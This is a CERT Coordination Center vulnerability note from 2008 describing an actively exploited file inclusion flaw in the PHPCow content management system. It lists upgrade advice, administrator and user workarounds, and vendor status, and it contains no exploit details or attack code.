search menu icon-carat-right cmu-wordmark

CERT Coordination Center

PHPCow file inclusion vulnerability

Vulnerability Note VU#515417

Original Release Date: 2008-11-19 | Last Revised: 2008-11-19

Overview

Older versions of PHPCow contain a file inclusion vulnerability that could allow an attacker to take control of a vulnerable application.

Description

PHPCow is a content management system that uses PHP. Older versions of PHP contain a file inclusion vulnerability. We are aware of reports that this issue being actively exploited.

Impact

A remote attacker may be able to take control of a vulnerable PHPCow application.

Solution

Upgrade

It is not clear which versions of PHPCow are vulnerable. The PHPCow suppport team has reported that recent versions of PHPCow addressed this issue. Contact PHPCow for more information about obtaining updated software.


Workarounds for administrators

    • Administrators are encouraged to periodically check their web server log files for indications (such as malformed URLs) that their web applications have been compromised.
    • Web application firewalls and reverse proxy servers may be able to block some known attacks.

Workarounds for users
    • Following the recommendations in the Securing Your Web Browser document will mitigate many attacks that an attacker may launch after taking over a web application.

Vendor Information

515417
 
Affected   Unknown   Unaffected

PHPCow, LLC

Updated:  November 19, 2008

Status

  Vulnerable

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

Addendum

It is not clear which versions of PHPCow are vulnerable. See http://www.phpcow.com/?c=131 for more information.

If you have feedback, comments, or additional information about this vulnerability, please send us email.


CVSS Metrics

Group Score Vector
Base N/A N/A
Temporal N/A N/A
Environmental N/A

References

Acknowledgements

This document was written by Ryan Giobbi.

Other Information

CVE IDs: None
Severity Metric: 1.35
Date Public: 2008-11-19
Date First Published: 2008-11-19
Date Last Updated: 2008-11-19 16:35 UTC
Document Revision: 26

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.